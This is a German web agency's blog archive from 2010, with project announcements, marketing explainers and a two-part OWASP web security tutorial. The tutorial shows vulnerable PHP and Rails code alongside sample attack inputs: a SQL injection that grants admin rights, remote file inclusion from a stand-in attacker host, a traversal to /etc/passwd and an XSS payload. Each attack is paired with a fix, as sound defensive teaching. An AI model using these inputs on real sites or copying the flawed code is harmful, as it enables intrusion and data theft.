AQUANTUM GmbH

Relaunch der Website von Runtal

Cordula — Tue, 22 Jun 2010 07:06:46 +0000

Runtal ist ein Unternehmen der Schweizer Zehnder Group AG und Hersteller von Designheizkörpern im oberen Preissegment. Im Zuge der Repositionierung der Marke Runtal und Fokusierung auf neue Märkte und Zielgruppen, wurde auch ein neues Corporate Design entwickelt.

Wir haben den Auftrag, eine Website zu entwickeln, die der neuen Ausrichtung des Unternehmens gerecht wird und den Premiumanspruch der Marke genauso erfüllt, wie die Produkte und der Service von Runtal.

Anforderungen

Die neue Website von Runtal soll der zentrale digitale Anlaufpunkt sein und Architekten, Fachhändlern, Planern, Installateuren, Fachjournalisten und Endkunden Inspiration, Information und Service auf hohem Niveau bieten.

Die neue Website soll:
- das neue Corporate Design in medienspezifischer und Ausprägung zeigen.
- den Wiedererkennungswert von Runtal stärken.
- Produktinformationen in den Mittelpunkt stellen.
- mit den Zielgruppen in Dialog treten.
- den Premiumgedanken vermitteln und fassbar machen.
- sich mit den Designern der Heizkörper auseinandersetzen.
- eine effiziente Verwaltung der Länderseiten ermöglichen.

Unsere Aufgaben

- Konzeption mit Informations- und Navigationsarchitektur
- Interface Design
- Content Design
- Technische Umsetzung mit syndicat® inklusive Schnittstelle zur Produktdatenbank von Runtal

Das Lead Design bzw. Layout erarbeiten wir gemeinsam mit New ID, Basel. New ID zeichnet sich für das neue Corporate Design von Runtal verantwortlich und gibt die Markenstrategie vor.

Was eine Landing Page?

Klaus — Mon, 07 Jun 2010 11:08:11 +0000

Es gab Zeiten, in denen Google Adwords noch ein echter „Geheimtipp“ war. Man investierte etwas Geld und ein positiver Return war quasi garantiert. Dies hat sich geändert. Adwords sind nicht mehr billig, Suchmaschinenoptimierung ist aufwendig und der Wettbewerbsdruck hoch.
Als Antwort auf diese Entwicklung setzt das Online Marketing auf ein bewährtes Konzept: Man steigert die Professionalität, optimiert die Aktivitäten und verbessert dadurch die Effizienz.
So genannte Landing Pages sind hierbei zu einem wichtigen Instrument geworden. Auf ihnen findet der erste Kontakt potentieller Kunden mit einer Website statt. Auf ihnen entscheidet sich schon nach wenigen Sekunden, ob der Besucher sich wieder abwendet oder bleibt und zum Kauf bewegt werden kann.
Aber was genau ist eine Landing Page und wie ist diese mit der bestehenden Website verknüpft?

Welche Aufgabe hat eine Website?
Die Website eines Unternehmens muss mehrere Aufgaben erfüllen (z.B. Unternehmen vorstellen, Produkte präsentieren & verkaufen, Stellenangebote veröffentlichen, News publizieren, Newsletter-Abonnenten generieren, etc …).
Sie ist „Generalist“ und kann in Teilbereichen zwar gute Leistung, aber nur selten Spitzenleistungen vollbringen.

Welche Aufgabe hat eine Landing Page?
Eine Landing Page hingegen verfolgt ausschließlich eine Aufgabe (z.B. ein bestimmtes Produkt verkaufen). Sie ist „Spezialist“ und wird erstellt, um in genau einem Spezialgebiet Spitzenleistung zu vollbringen.

Was ist eine Landing Page?
Eine Landing Page ist integraler Bestandteil eines Konversionprozesses (z.B: ein Verkaufsprozess) und muss deshalb immer in diesem Zusammenhang betrachtet werden.

Dieser Prozess beginnt mit einem Werbemittel, welches beispielsweise ein Werbebanner oder ein Suchergebnis in Google sein kann. Auch eine Anzeige in Printmedien kann am Anfang eines Konversionprozesses stehen, der dann im Internet auf einer Landing Page fortgesetzt wird.

Die Landing Page selbst ist eine einzelne Seite, die unmittelbar nach dem Mausklick auf das Werbemittel erscheint bzw. nach dem betrachten einer Print-Anzeige durch Eintippen der Internetadresse aufgerufen wird.
Die Landing Page hat als virtueller Berater/Verkäufer 5 bis 10 Sekunden Zeit, um die Interessenten davon zu überzeugen, dass sie hier richtig aufgehoben sind, ihr Vertrauen zu gewinnen um anschließend den Prozess fortsetzen zu können.

Ideale Landing Pages:

sind auf das Werbemittel abgestimmt,
stellen das beworbene Angebot in den Mittelpunkt,
vermeiden jegliche Ablenkung,
enthalten die wichtigsten Argumente,
räumen Bedenken aus und
setzen den Konversionprozess fort.

Die Fortsetzung des Prozesses geschieht beispielsweise durch die Integration von Aktionselementen wie einem Anfrageformular, einem Link zum Webshop oder der prominenten Einblendung einer Telefonnummer.

Landing Pages und Suchmaschinenoptimierung (SEO)
Landing Pages können ohne jegliche SEO-Maßnahmen erfolgreich sein. Beispielsweise dann, wenn Besucher über Bannerwerbung oder bezahlte Textanzeigen zur Landing Page geleitet werden.
Da diese Art der Besuchergenerierung mit dauerhaften Ausgaben verbunden ist, nimmt eine gute Positionierung in den unbezahlten Suchergebnissen von Suchmaschinen einen hohen Stellenwert ein.
Durch Optimierung der einzelnen Seiten einer Website für jeweils spezifische Begriffe werden die vorderen Ränge von Google & Co. angestrebt. Gelingt diese Optimierung, hat man anstelle eines bezahlten Werbemittels ein „unbezahltes“ Suchergebnis, welches den Besucher auf eine bestimmte Zielseite der Website führt.
In der Literatur wird für diese Zielseite oft zugleich der Begriff Landing Page verwendet. Bedenkt man die oben genannten Anforderungen an eine Landing Page erkennt man schnell, dass Zielseiten diese in vielen Fällen nicht erfüllen. Erst wenn eine Zielseite auf eine bestimmte Konversion ausgerichtet und darauf hin optimiert wird, kann von einer Landing Page gesprochen werden.

Web Application Security (Teil 2)

Sebastian — Wed, 02 Jun 2010 10:00:38 +0000

Dies ist der zweite Teil unserer Reihe zum Thema “Web Application Security” in Anlehnung an die Top 10 Sicherheitsrisiken für Webanwendungen des Open Web Application Security Projects (OWASP).

2. Cross-Site Scripting (XSS)

Cross-Site Scripting (abgekürzt mit “XSS”) bezeichnet das Einschleusen von clientseitig ausführbarem Code in eine Webanwendung. Der eingeschleuste Code wird im Browser anderer Anwender ausgeführt und besteht in den meisten Fällen aus JavaScript. Auf diese Weise lassen sich verschiedenste Angriffe durchführen:

Das Mitschneiden von Tastatureingaben auf der verwundbaren Website.
Die Übernahme von Sitzungen (z.B. als eingeloggter Administrator der Website) durch Auslesen der Session-Cookies.
Das Ausführen beliebiger Aktionen im Kontext des angemeldeten Benutzers (z.B. das Hinzufügen eines neuen Administrators).

Auch mit eingeschleustem HTML+CSS lassen sich Angriffe durchführen, z.B. durch das Überlagern eines Passwort-Formulars mit einem eigenen Formular, welches die Formulardaten an den eigenen Server sendet.

Wie entstehen Cross-Site Scripting Lücken?

Cross-Site Scripting Lücken entstehen ähnlich wie Injection Lücken durch die ungeprüfte Übernahme von Benutzerparametern. XSS-Code wird jedoch erst bei der Ausgabe und Interpretation durch den Browser zur Gefahr. XSS-Lücken entstehen also durch die ungefilterte Ausgabe von Benutzerparametern:

Für XSS anfälliger PHP Code:
setcookie('secret', '123456'); echo 'Hallo, '.$_GET['name'].'!'; ?>

Für XSS anfälliges Ruby on Rails Template:
<% cookies[:secret] = { :value => '123456' } %> <%= 'Hallo, '+params[:name].to_s+'!' %>

Der PHP-Code und das Rails Template ermöglichen das Einschleusen von JavaScript-Code über den Parameter “name”. Der folgende Link enthält als Wert für “name” URL-kodierten JavaScript-Code, der den Benutzer von localhost auf einen anderen Server weiterleitet und den Inhalt des von localhost gesetzten Cookies als Parameter übergibt:

XSS Example Link

Natürlich kann ein Angreifer keinen Schaden anrichten, so lange er selbst diese präparierte URL aufruft. Bindet er jedoch die URL als Quelle eines iframes in einer eigenen Webseite ein, wird der im Parameter “name” übergebene JavaScript-Code bei jedem Besucher der präparierten Webseite im Kontext der eigentlich vertrauenswürdigen Website ausgeführt. Durch Cross-Site Scripting Lücken ist es also möglich, die Same Origin Policy der Browser zu umgehen.

Alle Benutzervariablen, die ungefiltert ausgegeben werden, sind potentielle Cross-Site Scripting Lücken. Dazu zählen z.B. Fehlermeldungen in Formularparametern, Suchergebnisse und Datenbankinhalte wie Profilinformationen in Online-Communities, Forenbeiträge oder Benutzerkommentare. Persistent gespeicherte und ungefiltert ausgegebene Benutzerparameter erlauben die Ausführung von JavaScript-Code im Browser anderer Anwender ohne die Notwendigkeit, eigene Webseiten zu präparieren.

Wie kann ich eine Anwendung vor Cross-Site Scripting schützen?

Um eine Anwendung vor Cross-Site Scripting zu schützen, müssen alle Benutzerdaten vor der Ausgabe gefiltert werden, damit alle Metazeichen des Ausgabekontexts durch entsprechende Zeichenreferenzen ersetzt werden. Das heißt, daß praktisch alle Zeichen ersetzt werden müssen, die vom Browser an der entsprechenden Stelle nicht als Teil einer reinen Zeichenkette interpretiert werden. Im Fall unserer Beispielcodes betrifft das insbesondere die Zeichen “<" und ">“, die mittels der Funktionen htmlspecialchars (PHP) bzw. html_escape (Rails) ersetzt werden können:

Mit Hilfe von htmlspecialchars abgesicherter PHP Code:
setcookie('secret', '123456'); echo 'Hallo, '.htmlspecialchars($_GET['name']).'!'; ?>

Mit Hilfe von html_escape abgesichertes Ruby on Rails Template:
<% cookies[:secret] = { :value => '123456' } %> <%= 'Hallo, '+h(params[:name].to_s)+'!' %>

Wichtig ist, jeweils den Kontext der Ausgabe zu beachten. Werden Benutzerparameter beispielsweise als Attributwerte eines HTML-Tags ausgegeben, reicht es nicht, nur die Zeichen “<" und ">” zu ersetzen. Das folgende Rails Template ist beispielsweise trotz der Verwendung von html_escape verwundbar, auch wenn dies auf den ersten Blick nicht offensichtlich ist:
.png'/>

Übergibt man folgenden Code als Wert für den Parameter “img”, öffnet sich zur Demonstration der XSS-Lücke eine JavaScript-Dialogbox:
'%20onerror=alert(1)%20alt='

In diesem Fall besteht die Lücke darin, das html_escape nur die Zeichen &, >, < und " (Double Quote) filtert, nicht jedoch das Zeichen ‘ (Single Quote), wir aber Single Quotes für die Angabe des HTML-Attributs “src” verwenden. Abhilfe schafft hier die Verwendung von Double Quotes zur Umschließung von HTML-Attributen oder die Verwendung der tag helper Funktion, die automatisch Double Quotes um Attribute setzt und HTML Metazeichen in die entsprechenden Referenzen umwandelt:
<%= tag(:img, { :src => '/images/'+params[:img].to_s+'.png' }) %>

Schwierig wird es, wenn Benutzer die Möglichkeit haben sollen, HTML zur Formatierung ihrer Texte zu verwenden, beispielsweise zur Umsetzung eines Online-RichText-Editors. So ist es nicht möglich, pauschal alle Metazeichen zu ersetzen, da dann auch die erwünschten Formatierungselemente unbrauchbar werden. In diesem Fall ist ein speziell angepasster XSS-Filter notwendig, der erlaubte HTML-Tags und Attribute nicht filtert, gleichzeitig jedoch immun gegen die Vielzahl von XSS-Angriffsvektoren ist. Für Rails Applikationen lassen sich hierfür beispielsweise die Sanitize Helper nutzen.

Sicherheitsregeln

Alle Benutzervariablen, die ungefiltert ausgegeben werden, sind potentielle Cross-Site Scripting Lücken.
Alle Metazeichen des Ausgabekontexts müssen durch entsprechende Zeichenreferenzen ersetzt werden.
Je nach Ausgabekontext (HTML body, HTML attribute, JavaScript, CSS) müssen unterschiedliche Metazeichen ersetzt werden.
Benutzervariablen niemals in Script Tags, HTML-Kommentaren, HTML-Attributnamen oder HTML-Tagnamen ausgeben, da innerhalb dieser Kontexte ein XSS-Filter nur schwer bis gar nicht umsetzbar ist.
Die XSS Prevention Rules (OWASP) befolgen.
Die Vielzahl der XSS-Angriffsvektoren beachten.

Was ist Facebook?

Klaus — Wed, 05 May 2010 12:26:01 +0000

Über acht Millionen Deutsche waren im April auf Facebook aktiv und monatlich kommen einige Hunderttausend Menschen dazu. Verständlich, dass immer öfter gefragt wird, was Facebook eigentlich ist.

Facebook selbst beschreibt sich als „ein soziales Netzwerk, das Menschen mit ihren Freunden, Arbeitskollegen, Kommilitonen und anderen Personen verbindet.“. Eine treffende, aber nicht unbedingt leicht verständliche Definition. Versuchen wir es mal mit einem praktischeren Erklärungsansatz:

Stellen Sie sich einen in München lebenden jungen Mann vor, der eine Schwester in Hamburg hat. Drei bis viermal im Jahr sehen sich die Geschwister und alle paar Wochen telefonieren sie miteinander bzw. senden sich E-Mails. Man ist grob auf dem Laufenden was bei der Schwester bzw. dem Bruder geschieht.
Doch was passiert in der Zwischenzeit? Am Montag hat die Tochter der Schwester den ersten Zahn bekommen, am Mittwoch ist der Bruder ist genervt über das starke Gewitter und am Donnerstag steht er eine Stunde im Stau… Meist keine weltbewegenden Dinge, aber dennoch ist man oft daran interessiert, was nahe stehende Menschen im Alltag erleben oder denken. In vielen dieser Fälle schreibt man aber weder sofort ein E-Mail, noch greift man zum Telefonhörer oder versendet eine SMS. Das Meiste gerät schlicht in Vergessenheit.

Es sei denn, man verwendet ein soziales Netzwerk wie Facebook. Geschaffen für „Nachrichten“ dieser Art ermöglicht Facebook den Austausch von kurzen, meist nebensächlichen aber dennoch oft interessanten Informationen. Man muss allerdings den Empfängerkreis der Mitteilungen beachten. Während eine E-Mail oder eine SMS zumeist an einzelne Personen gerichtet ist, sind Mitteilungen auf Facebook in der Regel (Ausnahmen können definiert werden) für den gesamten, eigenen Freundeskreis sichtbar. Wer genau zu ihren persönlichen Freunden gehört, können Sie selbst bestimmen.

Wie dieser Austausch funktioniert zeigt der folgende Auszug aus dem Facebook-Profil des Autors (Namen und Bilder von Freunden des Autors wurden hier mit einem Balken unkenntlich gemacht).

Am oberen Rande ist die Eingabemaske. Hier können Sie ihren Freunden mitteilen, was Sie bewegt.

Unterhalb der Eingabemaske werden die Neuigkeiten Ihrer Freunde in chronologischer Reihenfolge (sog. Newsstream) aufgelistet.
Der erste Freund, hier Anton genannt, hatte offensichtlich einen Unfall im Skiurlaub. Verständlich, dass die Freunde von Anton dies bedauern, und seine Mittelung mit Wünschen zur Genesung kommentieren. Zum Glück hat er sich nichts gebrochen.

Der nächste Freund denkt an Freitag. Es ist jedoch gerade erst Dienstag und alle teilen das gleiche Schicksal. Vermutlich kommentiert deshalb niemand sein Leid.

Natürlich kann Facebook noch mehr, aber diese Ansicht mit den hier sichtbaren Funktionen verdeutlicht den Kern des Sozialen Netzwerks: Der Verbindung von Menschen über den Austausch von Infos, Mitteilungen und Nachrichten.

Ausblick für Privatpersonen
Dieser Artikel sollte Ihnen einen ersten Einblick verschaffen und aufzeigen, wozu Facebook gut ist. Dass Facebook Spaß macht und sehr informativ ist, werden Sie aber erst dann feststellen, wenn Sie es selbst ausprobieren. Melden Sie sich bei Facebook an, suchen Sie nach Geschwistern, Freunden und Bekannten und verfolgen Sie das Geschehen. Wenn Sie wollen, können Sie dabei auch vollkommen passiv bleiben und anderen das „Reden“ überlassen. Interessant wird es bestimmt werden.
Auf der Website von Annette Schwindt finden Sie übrigens eine gute Einführung in Facebook. Dort werden die meisten Funktionen ausführlich erläutert.

Ausblick für Organisationen
Ergänzend zum Austausch von Informationen zwischen Freunden gibt es in Facebook so genannte „Offizielle Seiten“ (ehemals „Fanpages“), mit denen Privatpersonen sich über einen „Gefällt mir“-Button verbinden können. Diese Seiten sind das zentrale Instrument für die Aktivität von Organisationen innerhalb von Facebook. Sie ermöglichen es, den „Fans“ Informationen zuzusenden und mit ihnen in Dialog zu treten. Die Mitteilungen von „offiziellen Seiten“ werden den Abonnenten – „gleichberechtigt“ mit den Mitteilungen von Freunden – im Newsstream angezeigt. Dies sichert eine hohe Aufmerksamkeit und macht diese Seiten fürs Marketing sehr wertvoll. Mehr dazu erfahren Sie in unserem nächsten Artikel hier im Blog oder im persönlichen Gespräch.

VerpflegungsStelle.com

Klaus — Wed, 28 Apr 2010 22:07:52 +0000

„Einfach & reduziert“ war ein zentraler Wunsch unseres Kunden bei der Entwicklung seines neuen Online-Shops für Sporternährung „VerpflegungsStelle.com“. Angesichts einer Vielzahl von Produkten, Informationen und Funktionen eine gleichermaßen herausfordernde wie spannende Aufgabe.

Gelöst wurde diese beispielsweise durch eine sehr kompakte und zugleich übersichtliche Darstellung der Produktdetails. So wird die komplexe Logik eines Getreideriegels mit unterschiedlichen Geschmacksrichtungen (technisch & buchhalterisch gesehen jeweils ein eigenständiges Produkt), flexibler Kombination der Geschmacksrichtungen und Staffelpreisen über alle Geschmacksrichtungen hinweg hinter einem schlichten und intuitiv verständlichen Design versteckt. Da kein Wettbewerb der VerpflegungsStelle.com diese „Quadratur des Kreises“ bewerkstelligen konnte, wurde hiermit nebenbei ein klarer USP entwickelt.

Eine weitere Besonderheit des neuen Shops stellt dessen Bezahlprozess dar. Da das übliche Verfahren (Schritt 1: Kasse, Schritt 2: Zahlungsart, etc) oder Zwangsregistrierung in den meisten Shops zu zahlreichen Kaufabbrüche führt, wurde bei der VerpflegungsStelle eine einseitiges Bestellformular integriert.

Anschrift, Lieferart, Zahlverfahren und Zusammenfassung werden auf einer einzelnen Seite eingegeben bzw. angezeigt und bei Änderungen automatisch aktualisiert. Ein Kunde kann infolgedessen bereits mit drei bis vier Klicks im Shop eine Bestellung aufgeben. Einfacher und reduzierter ist wohl kaum machbar.

Unsere Rollen
* Konzeption und Design der Plattform
* Technische Umsetzung auf Basis von Magento

Web Application Security (Teil 1)

Sebastian — Tue, 27 Apr 2010 06:53:12 +0000

Am 19. April 2010 hat das Open Web Application Security Project (OWASP) eine aktualisierte Liste der Top 10 Sicherheitsrisiken für Webanwendungen herausgegeben. Ein guter Anlass, um näher zu erläutern wie diese Risiken zustande kommen, und, wie sie sich mit praktischen Hilfsmitteln vermeiden lassen.

Im ersten Teil unserer Reihe geht es um Sicherheitsrisiken, die das Einschleusen von fremdem Code (auf serverseite) ermöglichen – “Injection”.

1. Injection

Unter Injection versteht man jegliche Attacken, bei denen ein vom Angreifer eingeschleuster Code durch einen Interpreter der Webanwendung ausgeführt wird. Dazu zählen z.B. SQL Injections, die Ausführung ungewollter Befehle durch eval Aufrufe und Remote File Inclusion.

Wie entstehen Injection Lücken?

Meist entstehen Injection Lücken durch die ungeprüfte Übernahme von Benutzerparametern. Das folgende Beispiel demonstriert eine typische SQL Injection Lücke in einer PHP-Anwendung, die anhand eines URL-Parameters verschiedene Artikel ausgibt:

$result = mysql_query("SELECT * FROM articles WHERE id="+$_GET["id"]);

Ein Angreifer könnte als Parameter für die ID den folgenden Code übergeben:

http://vulnerable.example.org/articles?id=42;UPDATE+users+SET+role=1+WHERE+id=23

Daraus entsteht folgender SQL Code:

SELECT * FROM articles WHERE id=42;UPDATE users SET role=1 WHERE id=23

Auf diese Weise führt der SQL Interpreter nicht nur den SELECT Befehl aus, sondern einen zusätzlichen UPDATE Befehl, der dem Benutzer mit der ID 23 die Benutzerrolle 1 (für Administratoren) zuweist.

Ein weiteres Beispiel demonstriert eine Remote File Inclusion Schwachstelle bei der Einbindung von PHP Scripten anhand einer im Cooke gespeicherten Benutzereinstellung:

$color = isset($_COOKIE['color']) ? $_COOKIE['color'] : 'red'; include $color+'.php';

Ein Angreifer könnte im Cookie als Wert für “color” einen der folgenden Werte eintragen:

http://evil.example.org/malicious/script.txt?
../../../../../../../../etc/passwd%00

Im ersten Fall wird externer Code vom Server des Angreifers nachgeladen, im zweiten Fall der Inhalt der Passwort-Datei des Servers ausgegeben. Die Zeichenfolge “%00″ entspricht dem “Null character” und ermöglicht andere Dateiendungen als ‘.php’ einzubinden, da das Nullzeichen das Ende der Zeichenkette signalisiert.

Als Einfallstor für eingeschleusten Code dienen also nicht nur Parameter in der URL einer Anwendung, sondern jegliche Daten, die von Benutzern verändert werden können und in der Anwendung verarbeitet werden. Dazu zählen HTTP-Parameter (GET, POST etc.), HTTP-Header (z.B. der User-Agent), Cookies, und Benutzerinhalte, die aus Datenbanken ausgelesen werden.

Wie kann ich eine Anwendung vor Injections schützen?

Die sicherste Methode um Benutzerparameter mit einer Anwendung zu verarbeiten, ist die Verwendung einer parametrisierten API. Bei der Verwendung einer solchen Schnittstelle wird der Programmcode getrennt von den Benutzerparametern übergeben und vom Interpreter verarbeitet. Die Benutzerparameter sind klar als variable Argumente definiert und werden vom Interpreter nur als solche behandelt, ohne die Möglichkeit darüber eigenen Code einzuschleusen.

Um SQL-Code sicher zu verarbeiten, gibt es mit Prepared Statements eine solche sichere API, die für verschiedene Programmiersprachen wie PHP oder Java verfügbar ist. Für Ruby on Rails gibt es noch keine Prepared Statements. Rails bringt aber mit ActiveRecord eigene Schnittstellen mit, die sicher vor SQL-Injection sind, wie beispielsweise Array Conditions und Hash Conditions.

Eine weitere sichere Methode zum Umgang mit Benutzerparametern ist die Verwendung einer “Whitelist”. D.h., es wird eine Liste von erlaubten Parametern festgelegt, mit denen der Benutzerparameter verglichen wird. Hier eine abgesicherte Version des vorigen Beispiels:

$allowed_colors = array('red', 'green', 'blue'); $color = isset($_COOKIE['color']) && in_array($_COOKIE['color'], $allowed_colors) ? $_COOKIE['color'] : 'red'; include $color+'.php';

Der Benutzerparameter $_COOKIE['color'] wird nur dann verwendet, wenn er in der Liste der erlaubten Farben verwendet wird. Andere Werte als ‘red’, ‘green’ oder ‘blue’ werden ignoriert, wodurch kein eigener Code eingeschleust werden kann.

Schwierig wird die Verwendung einer Whitelist, wenn vielfältige, variable Eingaben und spezielle Zeichenklassen oder verschiedene Kodierungen erlaubt sein sollen und eine parametrisierte API nicht verfügbar ist. In diesem Fall hilft die Verwendung einer speziell auf den Interpreter angepassten “Escape Syntax”, die alle potentiell gefährlichen Zeichen so maskiert, das sie vom Interpreter nicht als Programmcode gewertet werden können. MySQL Queries lassen sich in PHP z.B. mit mysql_real_escape_string absichern. Prepared Statements sind allerdings die bessere Alternative.

Sicherheitsregeln

Möglichst auf dynamische Code-Generierung verzichten. eval is evil!
Wann immer möglich, Benutzereingaben nur mit einer parametrisierten API verarbeiten, bei der Programmcode und vom Benutzer definierte Variablen getrennt interpretiert werden.
Gültige Benutzervariablen mit einer Whitelist (von erlaubten Werten) vergleichen. Whitelist statt Blacklist! Inhalte, Wertetypen und Kodierungen beachten!
Jegliche von Benutzern manipulierbare Werte als potentiell gefährlich betrachten. Dazu zählen alle vom Browser an den Server verschickten Daten sowie Inhalte aus Datenbanken und anderen externen Quellen.

=> Web Application Security – Teil 2 – Cross-Site Scripting (XSS)

Facebook und Twitter

Petra — Thu, 22 Apr 2010 08:00:56 +0000

Wir strecken unsere Fühler ins Netz aus und richten uns gerade in Facebook und Twitter häuslich ein. Erstmal ohne vertrieblichen Hintergedanken, laden wir dort die Sachen ab, für die wir keinen Blogartikel schreiben wollen oder können. Für’s Bloggen brauchen wir Zeit und Muse, beides fehlt manchmal leider…

Blau

Petra — Mon, 29 Mar 2010 15:11:08 +0000

Manche Dinge brauchen Zeit, der Relaunch unseres Corporate Designs zum Beispiel. Lange gewünscht, Ende 2008 beschlossen und März 2010 ist er nun fast fertig. Normalerweise brauchen wir für ein Relaunch-Projekt nicht so lange, aber interne Projekte werden von uns gerne mit niedrigerer Priorität als Kundenprojekte behandelt und wir vergessen dabei leicht die Regeln des guten Projektmanagements. So wird zum Beispiel kaum geplant, die Verantwortlichkeiten sind unklar definiert und an der Konzeptdokumentation wird auch gespart. Alles Faktoren die zum Scheitern eines Projektes beitragen. Verschärft wurde die Situation durch die turbulente zweite Jahreshälfte 2009, in der wir schlicht keine Zeit mehr hatten, uns mit unserer Identität zu beschäftigen. Ergebnis im Sommer: Ein eilig eingerichtetes WordPress Blog mit halbfertigem Design und schnell zusammengeschriebenen Inhalten.

In der Hoffnung, der Zustand möge sich schnell ändern, verschwand das Projekt den Rest des Jahres aus unserem Fokus und damit sozusagen in der virtuellen Schublade. Mit dem neuen Jahr und dem festen Vorsatz, einige Dinge in Zukunft besser zu machen, reaktivierten wir das ungeliebte Projekt. Bis auf die Logoschrift haben wir alles verworfen und von vorne angefangen. Diesmal mit schriftlichem Projektplan, einem auf die Mindestgrösse abgestecktem Team und gingen Schritt für Schritt mit Muse und Konzentration an die Arbeit.

Als erstes nahmen wir uns das Logo vor. Die im ersten Projektanlauf gewählte Schrift ATTriumvirate gefiel uns immer noch. Diese Schrift lieferte das schönste Schriftbild für das Wort „AQUANTUM“. Besonders das “Q” war uns bei vielen Schriften zu verspielt oder schnörkelig. Die Triumvirate ist fast eine Kopie (oder unfreundlicher ausgedrückt ein Plagiat) der Helvetica. Die Unterschiede zwischen beiden Schriften sind zwar fein, aber für uns entscheidend.

Soweit waren wir mit dem Logo zufrieden, aber uns fehlte noch etwas. Wir wünschten uns ein Element, das Teil des Logos ist, sich vielseitig einsetzen lässt und einfach gestaltet einen Bezug zu den Namensteilen “Aqua” und “Quantum” hat. Nancy fand ein Symbol, dass allen Anforderungen entspricht. Es ist Kreis und Welle, lässt sich als ‘a’ oder ‘q’ lesen, funktioniert ganz klein als Favicon und ganz gross an unserer Eingangstür.

Schwieriger gestaltete sich dann die Farbsuche. Unsere letzte Hausfarbe war orange. Wir wollten damit ein Gegengewicht zu unserem techniklastigen Image legen und verstanden sie als Farbe der Kommunikation. Sie funktionierte auch einige Jahre gut für uns, aber mit dem neuen Corporate Design stellten wir uns die Frage, ob wir sie wirklich behalten wollten. Nach einigem Hin und Her und etlichen Entwürfen mit anderen Farben, entschieden wir uns für Blau. Die Farbe lag alleine schon wegen unserem Namen und unserem Tätigkeitsfeld sehr nahe, sie steht für Wasser und Luft, Treue und Zuverlässigkeit, für Entspannung und Ruhe, Wissenschaft und Phantasie. Kurz: Keine Farbe passt besser zu uns und so war die Entscheidung zwar zögerlich getroffen, aber letztendlich nur folgerichtig.

Das klingt jetzt alles sehr einfach, aber bis wir zu unserem jetzigen Web Design kamen, landeten wir einigen in Sackgassen. Diese Irrungen waren keine verlorene Zeit, sondern zeigten uns, dass der Luxus für ein Projekt Zeit zu haben, uns letztendlich zu der bestmöglichen Lösung geführt hat. Das Design für unsere Website war schnell fertig, die Ableitungen für das Blog hier, Visitenkarten, Schilder und Vorlagen waren dann Routine.

Apropos Blog: Diese Seite ist tatsächlich eigentlich “nur” unser Blog. Wir arbeiten gerade an unserer Portfolio – Website und so bald wir damit online sind, werden hier die “über uns”-Seiten rausgenommen. Dann konzentrieren wir uns hier auf die Themen, die uns aktuell beschäftigen und die Vorstellung neuer Projekte.

Zum System: Wie kurz erwähnt, verwenden wir als Blogsystem WordPress. Grund dafür ist einerseits, dass wir es seit Jahren für unser internes Blog verwenden und uns damit auskennen. Andererseits wird es ständig aktualisiert, es gibt eine Fülle von Plugins und eigene Erweiterungen lassen sich leicht andocken. Da WordPress aber auch ein vollständiges CMS ist und für unsere Zwecke völlig ausreicht, werden wir unsere Website auch damit erstellen und verwalten.

Das WordPress Theme hat Sebastian von Grund auf neu und mit dem Grid System 960.gs gebaut. Wir werden hier demnächst über dieses und andere Grid Systeme sowie deren Vorteile bei der Web Entwicklung schreiben.

Social Media Optimization

Sebastian — Wed, 24 Mar 2010 15:10:32 +0000

Der Begriff „Social Media Optimization” wurde durch Rohit Bhargava’s Blog-Beitrag „5 Rules of Social Media Optimization (SMO)” geprägt. Darin geht es um die Optimierung des Webautritts im „Social Web”. Dazu zählen z.B. „Social Bookmarking”-Dienste, wie Delicious und Digg, sowie soziale Netzwerke wie Facebook. Durch Social Media Optimization ermutigen wir Nutzer dazu, Backlinks für unsere Website zu generieren und durch Bekanntmachung und Weiterverbreitung unserer Inhalte neue Besucher zu gewinnen.

Neben guten, weiterverwertbaren Inhalten und der Bereitstellung von Newsfeeds (RSS und Atom) und Social-Bookmarking-Buttons gibt es weitere Empfehlungen, die zur Optimierung für das soziale Web beachtet werden sollten:

Eingehende Links belohnen. Nutzer sind mehr geneigt, Links auf unsere Website zu setzen wenn sie selbst davon profitieren, beispielsweise durch einen Link zurück zu ihrer Seite. Backlinks zu verlinkenden Seiten lassen sich mit so genannten „Linkback”-Systemen (Refback, Trackback oder Pingback) automatisch erstellen. Automatisierte Linkback-Systeme bergen jedoch auch immer die Gefahr von Spamlinks.
Inhalte portabel zur Verfügung stellen. Das kann z.B. durch die Bereitstellung der Inhalte in alternativen Formaten wie PDF geschehen, oder durch die Download- Möglichkeit von Videos und Audio-Dateien. Hinweise und Links zur Quelle innerhalb der portablen Medien führen langfristig zu mehr Besuchern.
Den Nutzern möglichst viele hilfreiche Ressourcen anbieten, z.B. durch weiterführende Links auf externe Quellen.
Hilfreiche Nutzer belohnen, z.B. mit Ranglisten der besten Nutzerbeiträge.
Am sozialen Web teilnehmen:
- Einen Weblog einrichten und Bezug auf andere, themenrelevante Blogs nehmen.
- Die eigene Website selbst in „Social Bookmarking”-Diensten eintragen und mit sinnvollen Tags versehen.
- Selbst sinnvolle Beiträge und Kommentare in themenrelevanten Foren und Blogs verfassen und mit einem Link auf weiterführende Informationen auf der eigenen Website verweisen.
Transparenz. Den Nutzern ein echtes Bild der Macher zeigen und die Ziele und Pläne für die Website offenlegen.

Ist Facebook wichtig für Ihre Organisation?

Klaus — Mon, 15 Mar 2010 09:04:52 +0000

Facebook ist in aller Munde. Aber weshalb gibt es diesen “Hype” nur um eine einzelne „Website“? Ist bzw. wird Facebook wirklich relevant für den Alltag von Organisationen in Deutschland?

Zur Beantwortung dieser Frage betrachten wir zunächst die Nutzerzahlen und das Wachstum von Facebook. Im Februar 2010 hatte Facebook weltweit 400 Millionen aktive Nutzer – das sind mehr als alle Einwohner der Vereinigten Staaten. Nie zuvor gab es eine Internet-Community dieser Größe. Beachtlich hierbei ist, dass das Wachstum seit etwa einem halben Jahr mit monatlich ca. 25 Millionen neuen Usern scheinbar ungebremst voranschreitet.

Auch in Deutschland nimmt die Bedeutung von Facebook schnell zu. Laut facebookmarketing.de lag das Wachstum im Januar und Februar 2010 bei insgesamt ca. 1,9 Millionen neuen Benutzeraccounts. Mit 7,6 Millionen Personen im März (51 % davon weiblich) ist in Deutschland demnach fast jeder zehnte Einwohner auf Facebook aktiv. Von diesem Personenkreis sind etwa 15 % unter 18 Jahre, 75 % zwischen 18 und 44 Jahren und 10 % über 45 Jahre alt.

Facebook bietet Organisationen also bereits heute eine hohe Anzahl möglicher Kontakte. Dies gilt insbesondere für Organisationen, deren favorisierte Adressaten zwischen 18 und 44 Jahre alt sind. Aber auch in anderen Fällen kann Facebook aufgrund der noch meist geringen Wettbewerberdichte und der niedrigen Einstiegskosten attraktiv sein bzw. durch das starke Wachstum schon in wenigen Monaten relevant werden.

